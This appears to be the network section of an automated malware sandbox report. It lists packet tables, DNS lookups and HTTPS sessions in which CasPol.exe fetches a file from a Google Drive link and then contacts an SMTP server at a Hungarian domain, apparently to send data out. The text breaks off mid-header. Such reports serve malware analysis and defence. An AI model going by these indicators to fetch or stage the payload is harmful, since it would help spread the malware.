Dec 1, 2021 19:10:27.321315050 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.321461916 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.321485996 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.321511030 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.321696997 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.321724892 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.321962118 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.321990967 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.322211981 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.322222948 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.322242022 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.322431087 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.322477102 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.322731018 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.322767019 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.322804928 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.322875977 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.322953939 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.322977066 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.323146105 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.323177099 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.323415041 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.323446035 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.323684931 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.323873997 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.323896885 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.323911905 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.323940992 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.324069977 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.324131012 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.324233055 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.324340105 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.324512005 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.324536085 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.324737072 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.324768066 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.324876070 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.324927092 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.324955940 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.325069904 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.325088024 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.325103045 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.325251102 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.326814890 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.327018023 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.327066898 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.327224970 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.327251911 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.327301979 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.327373981 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.327452898 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.327475071 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.327665091 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.327666998 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.327699900 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.327825069 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.327853918 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.327881098 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.328116894 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.328123093 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.328156948 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.328274012 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.328321934 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.328342915 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.328536034 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.328557968 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.328850985 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.328855038 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.328882933 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.329066038 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.329086065 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.329226971 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.329248905 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.329407930 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.329438925 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.329464912 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.329598904 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.329621077 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.329657078 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.329804897 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.329833984 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.329974890 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.329994917 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.330137968 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.330161095 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.330317020 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.330343008 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.330372095 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.330497026 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.330574989 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.330730915 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.330753088 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.330893993 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.330914021 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.331067085 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.331104994 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.331130028 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.331262112 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.331276894 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.331293106 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.331482887 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.331496000 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.331518888 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.331640005 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.331654072 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.331667900 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.331814051 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.331840038 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.331990957 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.332015038 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.332161903 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.332174063 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.332197905 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.332321882 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.332398891 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.332417011 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.332432032 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.332571983 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.332581043 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.332591057 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.332740068 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.332743883 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.332758904 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.332879066 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.332890034 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.332907915 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.332927942 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.332940102 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.333084106 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.333086967 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.333102942 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.333240032 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.333252907 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.333393097 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.333420038 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.333434105 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.333535910 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.333549023 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.333671093 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.333688021 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.333751917 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.333753109 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.333767891 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.333825111 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.333933115 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.333950996 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.333964109 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.334100962 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.334147930 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.334162951 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.334238052 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.334319115 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.334331989 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.334508896 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.334516048 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.334533930 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.334707975 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.334722996 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.334886074 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.334897995 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.334912062 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.335031033 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.335046053 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.335113049 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.335128069 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.335247993 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.335262060 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.335345984 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.335355997 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.335366011 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.335473061 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.335489988 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.335587978 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.335594893 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.335611105 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.335635900 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.335751057 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.335763931 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.335776091 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.335926056 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.335957050 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.335978031 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.336066961 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.336070061 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.336113930 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.336129904 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.336191893 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.336206913 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.336240053 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.336258888 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.336287975 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.336297035 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.336337090 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.336435080 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.336497068 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.336520910 CET	443	49811	142.250.185.97	192.168.11.20
Dec 1, 2021 19:10:27.336524963 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:10:27.336623907 CET	49811	443	192.168.11.20	142.250.185.97
Dec 1, 2021 19:12:02.349112988 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:02.370971918 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:02.371129990 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:02.532605886 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:02.533047915 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:02.555299044 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:02.555516005 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:02.579087973 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:02.581842899 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:02.609457016 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:02.609519958 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:02.609569073 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:02.609601021 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:02.609791040 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:02.609847069 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:02.610941887 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:02.613818884 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:02.636099100 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:02.677953005 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:02.747499943 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:02.769589901 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:02.770600080 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:02.792973042 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:02.793421984 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:02.821939945 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:02.822565079 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:02.844960928 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:02.845463991 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:02.906896114 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:02.973288059 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:02.973676920 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:02.996062040 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:03.037215948 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:03.059843063 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:03.059889078 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:03.059936047 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:03.059984922 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:12:03.081957102 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:03.082000017 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:03.082022905 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:03.082045078 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:04.799392939 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:12:04.849292040 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:13:04.872915983 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:13:04.873254061 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:13:42.234354973 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:13:42.258070946 CET	587	49839	185.111.89.226	192.168.11.20
Dec 1, 2021 19:13:42.258305073 CET	49839	587	192.168.11.20	185.111.89.226
Dec 1, 2021 19:13:42.258697987 CET	49839	587	192.168.11.20	185.111.89.226

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 19:10:26.212265968 CET	58238	53	192.168.11.20	1.1.1.1
Dec 1, 2021 19:10:26.221477032 CET	53	58238	1.1.1.1	192.168.11.20
Dec 1, 2021 19:10:26.868185043 CET	59829	53	192.168.11.20	1.1.1.1
Dec 1, 2021 19:10:26.911423922 CET	53	59829	1.1.1.1	192.168.11.20
Dec 1, 2021 19:12:02.195431948 CET	55110	53	192.168.11.20	1.1.1.1
Dec 1, 2021 19:12:02.303282022 CET	53	55110	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 1, 2021 19:10:26.212265968 CET	192.168.11.20	1.1.1.1	0xba6	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Dec 1, 2021 19:10:26.868185043 CET	192.168.11.20	1.1.1.1	0x7351	Standard query (0)	doc-08-6k-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Dec 1, 2021 19:12:02.195431948 CET	192.168.11.20	1.1.1.1	0xe5b4	Standard query (0)	mail.csavarcsapagyexpress.hu	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 1, 2021 19:10:26.221477032 CET	1.1.1.1	192.168.11.20	0xba6	No error (0)	drive.google.com		142.250.185.78	A (IP address)	IN (0x0001)
Dec 1, 2021 19:10:26.911423922 CET	1.1.1.1	192.168.11.20	0x7351	No error (0)	doc-08-6k-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 19:10:26.911423922 CET	1.1.1.1	192.168.11.20	0x7351	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.97	A (IP address)	IN (0x0001)
Dec 1, 2021 19:12:02.303282022 CET	1.1.1.1	192.168.11.20	0xe5b4	No error (0)	mail.csavarcsapagyexpress.hu	csavarcsapagyexpress.hu		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 19:12:02.303282022 CET	1.1.1.1	192.168.11.20	0xe5b4	No error (0)	csavarcsapagyexpress.hu		185.111.89.226	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-08-6k-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49810	142.250.185.78	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 18:10:26 UTC	0	OUT	GET /uc?export=download&id=1V_BC3orZyo_CjeEmMyBVynAV_UOPmtl6 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2021-12-01 18:10:26 UTC	0	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 01 Dec 2021 18:10:26 GMT Location: https://doc-08-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/q217t7l1ccsuj5vlu8k9v7g15blolesf/1638382200000/11612195336931281153/*/1V_BC3orZyo_CjeEmMyBVynAV_UOPmtl6?e=download P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]} Content-Security-Policy: script-src 'nonce-X1k035sirryC5EI3uy6/OA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq" X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=511=U5KdlzBE9rcFyV9f2sq3C9sVmXc3Lp_r7FqxH7BEv53E3bW9A0tIcmXR65JxiWCd-SC5Cszb2eq4bYUh_fipuUvbNZKb9-_w3Fjoq4NgnT8VSt_XFqCgkGkydGbgsQeNBbFcI7GK8F0zkAPLmjSUugN7QLBsjMsVpYAoUExEQuQ; expires=Thu, 02-Jun-2022 18:10:26 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-12-01 18:10:26 UTC	1	IN	Data Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 38 2d 36 6b 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 71 32 31 37 Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-08-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/q217
2021-12-01 18:10:26 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49811	142.250.185.97	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 18:10:26 UTC	2	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/q217t7l1ccsuj5vlu8k9v7g15blolesf/1638382200000/11612195336931281153/*/1V_BC3orZyo_CjeEmMyBVynAV_UOPmtl6?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-08-6k-docs.googleusercontent.com Connection: Keep-Alive
2021-12-01 18:10:27 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycduWfXG_GfRrrtanxhz-iY1rPND9YLc3uI6ddR-rQ12yOnBv8RozLZ4JawXuM1okz3C1okm2IgHkp9SdbVBqi9QT_Iur7g Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, 